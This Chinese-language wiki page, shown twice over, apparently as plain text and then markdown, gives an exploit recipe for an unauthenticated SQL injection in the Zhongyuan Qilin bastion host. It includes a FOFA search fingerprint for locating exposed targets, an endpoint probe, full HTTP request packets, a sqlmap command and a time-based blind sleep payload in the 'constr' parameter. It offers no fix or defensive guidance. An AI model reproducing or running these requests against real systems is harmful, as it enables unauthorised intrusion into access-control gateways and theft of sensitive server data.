fofamini-wiki

登录白背景

源码

中远麒麟堡垒机前台Sql注入

漏洞描述

中远麒麟堡垒机前台Sql注入，可获取服务器敏感信息

漏洞影响

中远麒麟堡垒机

FOFA

cert.subject="Baolei"

漏洞复现

判断漏洞是否存在：

访问 host/baoleiji/api/tokens如果返回405就大概率存在，404就没有

请求包：

POST/baoleiji/api/tokensHTTP/1.1 
Host:172.25.6.175 
User-Agent:Mozilla/5.0(compatible;Baiduspider/2.0;+http://www.baidu.com/search /spider.html)
Content-Length:64 
Accept:application/json,text/plain,*/*
Accept-Language:zh-CN,zh;q=0.9 
Content-Type:application/x-www-form-urlencoded 
Origin:https://172.25.6.175 
Referer:https://172.25.6.175/baoleiji/
Sec-Fetch-Mode:cors 
Sec-Fetch-Site:same-origin 
Accept-Encoding:gzip

constr=1&title=%40127.0.0.1

直接跑sqlmap：

sqlmap-r1.txt-pconstr--dbms=mysql--level5--risk3--batch

截图就不提供了，很多真实环境sqlmap跑不出来，需要手工验证

POST /baoleiji/api/tokens HTTP/1.1
Host: 172.25.6.175:443
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search
/spider.html)
Content-Length: 64
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Origin: https://172.25.6.175
Referer: https://172.25.6.175/baoleiji/
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip
constr=1'and(select*from(select+sleep(5))o)='&title=%40127.0.0.1

注入点为constr,时间盲注，可通过修改sleep来验证

# 中远麒麟堡垒机前台Sql注入

## 漏洞描述

中远麒麟堡垒机前台Sql注入，可获取服务器敏感信息

## 漏洞影响

> 中远麒麟堡垒机

## FOFA

> cert.subject="Baolei"

## 漏洞复现

判断漏洞是否存在：

访问 host/baoleiji/api/tokens如果返回405就大概率存在，404就没有

请求包：

```
POST/baoleiji/api/tokensHTTP/1.1 
Host:172.25.6.175 
User-Agent:Mozilla/5.0(compatible;Baiduspider/2.0;+http://www.baidu.com/search /spider.html)
Content-Length:64 
Accept:application/json,text/plain,*/*
Accept-Language:zh-CN,zh;q=0.9 
Content-Type:application/x-www-form-urlencoded 
Origin:https://172.25.6.175 
Referer:https://172.25.6.175/baoleiji/
Sec-Fetch-Mode:cors 
Sec-Fetch-Site:same-origin 
Accept-Encoding:gzip

constr=1&title=%40127.0.0.1
```

直接跑sqlmap：

```
sqlmap-r1.txt-pconstr--dbms=mysql--level5--risk3--batch
```
截图就不提供了，很多真实环境sqlmap跑不出来，需要手工验证
```
POST /baoleiji/api/tokens HTTP/1.1
Host: 172.25.6.175:443
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search
/spider.html)
Content-Length: 64
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Origin: https://172.25.6.175
Referer: https://172.25.6.175/baoleiji/
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip
constr=1'and(select*from(select+sleep(5))o)='&title=%40127.0.0.1
```
注入点为constr,时间盲注，可通过修改sleep来验证